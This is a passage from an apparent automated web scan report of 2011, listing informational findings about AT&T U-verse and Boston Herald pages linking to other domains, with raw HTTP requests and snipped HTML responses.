for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...

17.34. http://attuverseoffers.com/tv_hsi_bundles/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attuverseoffers.com
Path:   /tv_hsi_bundles/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O HTTP/1.1
Host: attuverseoffers.com
Proxy-Connection: keep-alive
Referer: http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.3
Set-Cookie: origin=20State_49PromoOffer; expires=Mon, 17-Oct-2011 01:38:39 GMT; path=/; domain=attuvereseoffers.com
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:38:39 GMT
Content-Length: 19572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!-- JAVASCRIPTS -->
<script language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.0/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
...[SNIP]...
<body>
<iframe src="http://view.atdmt.com/iaction/cntacp_22UverseLPtest_LP_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
<iframe src="http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3?" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<div class="logo"><a href="http://view.atdmt.com/action/bvkatl_UverseDisplayTVHSIATTLogo_1 "><img src="images/uverseLogo.png" alt="AT&T - Rethink Possible"/>
...[SNIP]...
<div id="lifestyleMain"><a href="http://view.atdmt.com/action/bvkatw_UverseDisplayTVHSI49Promo20StateHeroTVI_1"><img src="images/lifestyle082911.png"/>
...[SNIP]...
<div><a href="http://view.atdmt.com/action/bvkatw_UverseDisplayTVHSI49Promo20StateHeroExp_1" class="exploreBtn"><span class="ClearviewATT-Bold">
...[SNIP]...
<div class="heroCTA"><a href="http://view.atdmt.com/action/bvkatw_UverseDisplayTVHSI49Promo20StateHeroChe_1"/><img src="images/checkAvail_SndInst2.png" />
...[SNIP]...
<div id="heroDisc1" class="disclaimer1"><a href="http://view.atdmt.com/action/bvkatw_UverseDisplayTVHSISeeDetailsLink_1" target="_blank">See Details</a>
...[SNIP]...
<div class="leftColCta"><a <a onclick="return hs.htmlExpand(this, { objectType: 'iframe',width:600, height:650,outlineType:'rounded-white' } )" href="http://view.atdmt.com/action/bvkatl_UverseDisplayTVHSIHDChannelLineupPopUp_1 "><img src="images/channelLineUpCTA.png" />
...[SNIP]...
<div class="chooseBtn"><a href="http://view.atdmt.com/action/bvkatl_UverseDisplayTVHSIPickYourSpeedButton_1"><img src="images/pickYourSpeedCTA.png" alt="pickYourSpeedCTA" />
...[SNIP]...
<map name="sharemap">
                   <area style="background-color:#06F"target="_blank" shape="rect" coords="6,61,23,78" href="http://www.twitter.com" onclick="this.href=meteor.sharing.href('Twitter',{'title':'AT&T U-verse TV and Internet Discover U-verse, discover the future. '});" />
                   <area target="_blank" shape="rect" coords="6,82,23,99" href="http://www.facebook.com" onclick="this.href=meteor.sharing.href('Facebook');" />
                   <area target="_blank" shape="rect" coords="6,101,23,119" href="http://www.linkedin.com" onclick="this.href=meteor.sharing.href('Linkedin');" />
                   <area target="_blank" shape="rect" coords="6,122,23,139" href="http://del.icio.us" onclick="this.href=meteor.sharing.href('del.icio.us');" />
                   <area target="_blank" shape="rect" coords="6,143,23,160" href="http://www.digg.com" onclick="this.href=meteor.sharing.href('Digg');" />                    
                   <area target="_blank" shape="rect" coords="6,164,23,181" href="mailto:" onclick="this.href=meteor.sharing.href('Email', {'title':'AT&amp;T U-verse(R) TV','desc':'Discover U-verse, discover t
...[SNIP]...
<div class="terSectCTA"><a href="http://view.atdmt.com/action/bvkatl_UverseDisplayTVHSIShopYourBundleNowButt_1"><img src="images/shopBundlesCTA.png" alt="Shop Your Bundle Now!" border="0"/>
...[SNIP]...
</span><a class="exploreBtn" href="http://view.atdmt.com/action/bvkatl_UverseDisplayTVHSIBottomExploreUverse_1 "><span class="ClearviewATT-Bold">
...[SNIP]...
<div class="stepBubble"><a href="http://view.atdmt.com/action/bvkatl_UverseDisplayTVHSIBottomCheckAvailabili_1"><img src="images/checkAvail_SndInst2.png" alt="Check Availability Now! Standard Installation Included."/>
...[SNIP]...
<p><a href="http://www.att.com/gen/privacy-policy?pid=2506" target="_blank">Privacy Policy</a> | <a href="http://www.att.com/gen/general?pid=11561" target="_blank">Terms of Use</a>
...[SNIP]...
<!--Google Analytics -->

<script src="http://www.att.com/webtrends/scripts/dcs_tag.js" type="text/javascript"></script>
...[SNIP]...

17.35. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 419
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/L9/661651530/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b6a6f4142316a4e?x" target="_blank"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif" WIDTH=1 HEIGHT=1 ALT="click here" border=0 BORDER="0"></A>

17.36. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Middle1&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 1879
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1?x" BORDER="0">
</a>
...[SNIP]...

17.37. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Middle&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/sports/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 1885
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle?x" BORDER="0">
</a>
...[SNIP]...

17.38. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:07 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 1854
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top?x" BORDER="0">
</a>
...[SNIP]...

17.39. http://bostonherald.com/news/columnists/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/columnists/view.bg?articleid=1366212 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.1.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/; RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:15:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
<!-- // END Facebook OpenGraph API //-->


<link rel="alternate" title="Columnists - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/columnists/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/peter_gelzinis.gif?1=1" alt="Peter Gelzinis" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1366212&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1366212&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1366212&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(45) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Kin: Feds, Whitey past tipping point');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0; top: 2px;"/>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1366212&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(45) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110915/ab8149_091511whiteysc006.jpg" alt="ANGER: Patricia Donahue, widow of..." /></div>
...[SNIP]...
<div id="embedDiv">


<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/2011_0915vegas_man_i_deserve__for_spotting_whitey/"><img src="http://multimedia.heraldinteractive.com/images/20110914/stp/4f0e04_981231whitey-bulger_2.jpg" alt="Vegas man: I deserve money for spotting Whitey Bulger" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://jobsearch.local-jobs.monster.com/Search.aspx?wt.mc_n=hjnpsearch&ch=bostonherald&q=&where=Boston&re=130&cy=us&brd=1">Find Boston Jobs</a>
...[SNIP]...
<h2><a href="http://bostonherald.loveaccess.com/">Personals</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.40. http://bostonherald.com/news/national/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/national/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/national/?type=rem911 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.21.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.6.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:31:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Remembering 9/11 - News &amp; Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/national/remembering_911/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fnational%2F%3Ftype%3Drem911&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
